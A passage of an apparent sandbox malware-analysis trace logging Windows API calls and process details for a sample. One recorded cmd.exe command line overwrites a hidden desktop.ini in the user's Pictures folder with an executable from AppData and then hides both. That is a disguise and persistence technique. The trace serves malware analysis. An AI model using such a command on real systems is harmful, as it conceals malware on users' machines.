| out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] GetFileType (hFile=0x4c) returned 0x1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.269] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.270] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.270] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] GetFileType (hFile=0x4c) returned 0x1 [0142.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.270] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.271] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.271] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x32, lpOverlapped=0x0) returned 1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.271] GetFileType (hFile=0x4c) returned 0x1 [0142.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.272] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x32, lpOverlapped=0x0) returned 1 [0142.272] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.272] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.272] _close (_FileHandle=4) returned 0 [0142.272] FindNextFileW (in: hFindFile=0x3f0e50, lpFindFileData=0x2cef84 | out: lpFindFileData=0x2cef84) returned 0 [0142.272] GetLastError () returned 0x12 [0142.272] FindClose (in: hFindFile=0x3f0e50 | out: hFindFile=0x3f0e50) returned 1 [0142.273] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.273] _close (_FileHandle=3) returned 0 [0142.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.274] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.274] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.274] SetConsoleInputExeNameW () returned 0x1 [0142.274] GetConsoleOutputCP () returned 0x1b5 [0142.274] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.274] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.274] exit (_Code=0) Process: id = "181" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ec0" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15204 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15205 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15206 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15207 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 15208 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15209 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15210 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15211 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15212 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 15213 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16238 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16239 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16240 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16241 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 16242 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 16243 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16244 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16245 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16246 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16247 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16248 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16249 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16250 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16252 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 16253 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16254 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16255 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16256 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16257 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16258 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16259 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 16260 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 16261 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 16399 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 238 os_tid = 0xf98 [0142.106] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8e4 | out: lpSystemTimeAsFileTime=0x20f8e4*(dwLowDateTime=0x8ea20320, dwHighDateTime=0x1d440a9)) [0142.106] GetCurrentProcessId () returned 0xf90 [0142.106] GetCurrentThreadId () returned 0xf98 [0142.106] GetTickCount () returned 0x2c7ff [0142.106] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8dc | out: lpPerformanceCount=0x20f8dc*=19889504874) returned 1 [0142.107] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0142.107] __set_app_type (_Type=0x1) [0142.107] __p__fmode () returned 0x76b331f4 [0142.107] __p__commode () returned 0x76b331fc [0142.107] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0142.107] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0142.107] GetCurrentThreadId () returned 0xf98 [0142.107] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf98) returned 0x38 [0142.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.107] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0142.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.107] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f874 | out: phkResult=0x20f874*=0x0) returned 0x2 [0142.108] VirtualQuery (in: lpAddress=0x20f8ab, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.108] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f844, dwLength=0x1c | out: lpBuffer=0x20f844*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0142.108] GetConsoleOutputCP () returned 0x1b5 [0142.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.108] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0142.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0142.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.109] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.109] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.109] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.109] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.109] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0142.109] GetEnvironmentStringsW () returned 0x310418* [0142.110] FreeEnvironmentStringsW (penv=0x310418) returned 1 [0142.110] GetEnvironmentStringsW () returned 0x310418* [0142.110] FreeEnvironmentStringsW (penv=0x310418) returned 1 [0142.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7e4 | out: phkResult=0x20e7e4*=0x40) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0xc8, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x0, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegCloseKey (hKey=0x40) returned 0x0 [0142.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7e4 | out: phkResult=0x20e7e4*=0x40) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x40, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x1, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x0, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.111] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x9, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.111] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x4, lpData=0x20e7f0*=0x9, lpcbData=0x20e7e8*=0x4) returned 0x0 [0142.111] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ec, lpData=0x20e7f0, lpcbData=0x20e7e8*=0x1000 | out: lpType=0x20e7ec*=0x0, lpData=0x20e7f0*=0x9, lpcbData=0x20e7e8*=0x1000) returned 0x2 [0142.111] RegCloseKey (hKey=0x40) returned 0x0 [0142.111] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0142.111] srand (_Seed=0x5b886370) [0142.111] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" [0142.111] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"" [0142.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0142.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.112] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 